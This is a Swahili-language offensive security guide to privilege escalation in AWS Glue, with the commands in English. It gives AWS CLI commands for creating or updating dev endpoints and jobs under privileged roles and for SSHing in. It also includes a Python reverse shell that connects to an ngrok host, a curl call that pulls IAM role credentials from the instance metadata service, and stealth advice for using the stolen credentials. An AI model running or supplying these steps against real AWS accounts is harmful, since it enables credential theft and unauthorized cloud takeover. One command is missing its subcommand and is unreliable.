AWS - Glue Privesc

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Watumiaji wenye ruhusa hizi wanaweza kuanzisha mwisho mpya wa maendeleo ya AWS Glue, wakitenga jukumu la huduma lililopo linaloweza kuchukuliwa na Glue na ruhusa maalum kwa mwisho huu.

Baada ya kuanzishwa, mshambuliaji anaweza SSH kwenye mfano wa mwisho, na kuiba akidi za IAM za jukumu lililotengwa:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Kwa madhumuni ya kujificha, inapendekezwa kutumia akreditivu za IAM kutoka ndani ya mashine ya virtual ya Glue.

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya glue lililotajwa.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Watumiaji wenye ruhusa hii wanaweza kubadilisha funguo za SSH za maendeleo za Glue zilizopo, kuwezesha ufikiaji wa SSH kwake. Hii inamruhusu mshambuliaji kutekeleza amri kwa mamlaka ya jukumu lililounganishwa na kiunganishi:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya glue inayotumika.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Watumiaji wenye iam:PassRole pamoja na glue:CreateJob au glue:UpdateJob, na glue:StartJobRun au glue:CreateTrigger wanaweza kuunda au kuboresha kazi ya AWS Glue, wakitenga akaunti yoyote ya Glue service, na kuanzisha utekelezaji wa kazi hiyo. Uwezo wa kazi hiyo unajumuisha kukimbia msimbo wa Python wa kawaida, ambao unaweza kutumiwa kuanzisha shell ya kurudi. Shell hii ya kurudi inaweza kisha kutumika kuhamasisha IAM credential za jukumu lililounganishwa na kazi ya Glue, ikisababisha uwezekano wa ufikiaji usioidhinishwa au vitendo kulingana na ruhusa za jukumu hilo:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya glue iliyotajwa.

glue:UpdateJob

Kwa ruhusa ya sasisho tu, mshambuliaji anaweza kuiba Akreditivu za IAM za jukumu lililounganishwa tayari.

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya glue iliyounganishwa.

Marejeleo

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/